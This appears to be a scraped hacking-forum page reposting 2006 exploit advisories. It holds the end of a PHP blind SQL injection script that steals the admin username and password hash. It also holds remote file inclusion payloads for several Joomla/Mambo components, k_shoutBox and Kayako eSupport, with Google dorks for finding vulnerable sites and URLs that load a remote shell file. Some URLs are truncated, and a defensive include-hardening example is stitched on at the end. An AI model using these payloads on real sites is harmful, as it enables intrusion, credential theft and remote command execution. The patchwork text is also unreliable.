{
  for ($i=0; $i<=255; $i++)
  {
    $sql="(SELECT(IF((ASCII(SUBSTRING(uname,$j,1))=".$i."),msg_time,subject)) FROM/**/".$prefix."users/**/WHERE/**/rank=7/**/and/**/level=5)/**/ASC/**/ LIMIT/**/1/*";
    echo "sql -> ".$sql."\r\n";
    $sql=urlencode($sql);
    $packet ="GET ".$p."modules/messages/index.php?sort=$sql&by=suntzu HTTP/1.0\r\n";
    $packet.="Accept-Encoding: text/plain\r\n";
    $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Cookie: ".$cookie."\r\n";
    $packet.="Connection: Close\r\n\r\n";
    sendpacketii($packet);
    if (!strstr($html,"111111111111111111111111")){$my_admin.=chr($i);echo "admin -> ".$my_admin."[???]\n";sleep(1);break;}
    if ($i==255) {die("Exploit failed ");}
  }
  $j++;
}
echo " \n";
echo "admin -> ".$my_admin."\n";
echo "password (md5) -> ".$my_password."\n";
echo " \n";
function is_hash($hash)
{
  if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
  else {return false;}
}
if (is_hash($my_password)) {echo "Exploit succeeded ";}
else {echo "Exploit failed ";}
?>

black_hat_cr(HCE)

Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability
Code:
################################################################## ##################
#JD-Wiki Remote File Include
JD-Wiki is the Joomla! integration of the nice DokuWiki. DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating documentation of any kind.
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote attacker to execute commands via rfi
path: ?mosConfig_absolute_path=
xpl: /components/com_jd- wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
Contact: irc.undernet.org #hackbsd & #ircmasters
# milw0rm.com [2006-08-07]

vns3curity(HCE)

Joomla MamboWiki Component <= 0.9.4 Remote File Inclusion Vulnerability
Search for sites affected by this bug with Google:
Code:
inurl:"com_mambowiki"
File affected by the bug: MamboLogin.php
Xploit:
Code:
http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP= http://huh?

black_hat_cr(HCE)

k_shoutBox <= 4.4 Remote File Inclusion Vulnerability
Code:
>>> Kurdish Security
>>> ShoutBox Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Risk : High
>>> Class : Remote
>>> Script : ShoutBox
>>> Site : http://www.knusperleicht.at
Code :
//**********************************************************
// INCLUDE PATH
define('SB_INCLUDE_PATH', $sb_include_path);
// INCLUDE PATH
//**********************************************************
include SB_INCLUDE_PATH.'inc/config.inc.php';
require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php ';
require_once SB_INCLUDE_PATH.'inc/Sb_template.php';
require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php';
require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php';
require_once SB_INCLUDE_PATH.'inc/Sb_database.php';
if(SB_INCLUDE_PATH == "") {
http://www.site.com/[path]/sb/index.php?sb_include_path=http://[site]/evilcode.txt ?&cmd=id
# milw0rm.com [2006-08-01]

vns3curity(HCE)

Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability
Code:
Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the current version (more like since v2.3.5) without warning users of previous versions, noobs.
Requires that "register_globals" is enabled.
Vulnerable File: esupport/admin/autoclose.php
Code:
require_once $subd . "functions.php";
Not-leet-enough: "Powered By Kayako eSupport"
http://www.google.com/search?q=%22He port+v2.3.1%22
http://www.google.com/search?q=%22He upport+v2.2%22
POC: http://omghax.com/esupport/admin/aut //remotefile/?
# milw0rm.com [2006-08-02]

vns3curity(HCE)

.
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Risk : High
>>> Class : Remote
>>> Script :
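
The file-inclusion posts above share one root cause: an include prefix (`$sb_include_path`, `$subd`, `mosConfig_absolute_path`) that the request can set when register_globals is on. The PHP below is an added example, not code from the posts or from the affected projects, showing the hardened form of that pattern; `resolve_include`, the allowlist and the temporary demo directory are hypothetical names and constructed data.

```php
<?php
// Added example, not code from the posts above.
// Pattern the advisories show (left as comments, never executed):
//   define('SB_INCLUDE_PATH', $sb_include_path);  // request-controlled under register_globals
//   require_once $subd . "functions.php";
// Hardened form: the base directory is fixed on disk and a request value can
// only pick an entry from an allowlist.

// Hypothetical helper: map a request key to a file under $base, or throw.
function resolve_include(string $key, array $allowed, string $base): string
{
    if (!isset($allowed[$key])) {
        throw new InvalidArgumentException('unknown include key');
    }
    $root = realpath($base);
    // Second layer in case an allowlist entry is wrong: realpath() works on
    // local paths only and returns false for URLs and missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $allowed[$key]);
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException('include resolves outside the base directory');
    }
    return $path;
}

// Constructed demo tree standing in for the application's own directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
mkdir($base . DIRECTORY_SEPARATOR . 'lang', 0700, true);
file_put_contents($base . '/lang/en.lang.inc.php', "<?php return ['greeting' => 'hello'];\n");
$allowed = ['en' => 'lang/en.lang.inc.php'];   // constructed allowlist

// Constructed request values: one valid key, then a remote URL and a traversal string.
foreach (['en', 'http://remote.example/x.txt?', '../../../etc/passwd'] as $input) {
    try {
        $file = resolve_include($input, $allowed, $base);
        $strings = require $file;
        echo "accepted {$input}: greeting={$strings['greeting']}\n";
    } catch (Exception $e) {
        echo "rejected {$input}: {$e->getMessage()}\n";
    }
}

// Clean up the demo tree.
unlink($base . '/lang/en.lang.inc.php');
rmdir($base . '/lang');
rmdir($base);
```

On the configuration side, `allow_url_include` should stay `Off` (its default), and `register_globals` no longer exists as of PHP 5.4.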